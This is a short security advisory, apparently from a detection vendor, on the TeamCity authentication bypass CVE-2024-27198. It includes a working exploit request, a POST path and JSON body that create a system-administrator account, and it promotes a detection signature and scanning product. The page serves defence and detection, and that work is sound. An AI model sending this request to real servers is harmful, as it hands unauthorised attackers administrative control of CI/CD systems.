top of page

JetBrains TeamCity Create Admin Authentication Bypass (CVE-2024-27198)



Application Details

TeamCity is a general-purpose CI/CD software platform that allows for flexible workflows, collaboration and development practices. It allows for continuous integration, continuous delivery, and continuous deployment within a DevOps process.


Vulnerability

An authentication bypass vulnerability found in JetBrains TeamCity versions before 2023.11.4 vulnerability could allow an attacker to gain administrative privileges.


Identification

An unauthenticated attacker can create a new administrator account by using the /app/rest/users REST API endpoint. This will bypass authentication checks and gain administrative control over the compromised server.

POST /hax?jsp=/app/rest/users;.jsp

PAYLOAD -
{"username": "haxor", "password": "haxor", "email": "haxor", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to bypass security restrictions,


Coverage

Idappcom has created signature 8024246 along with a traffic file for this vulnerability.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability, or others, why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

留言


bottom of page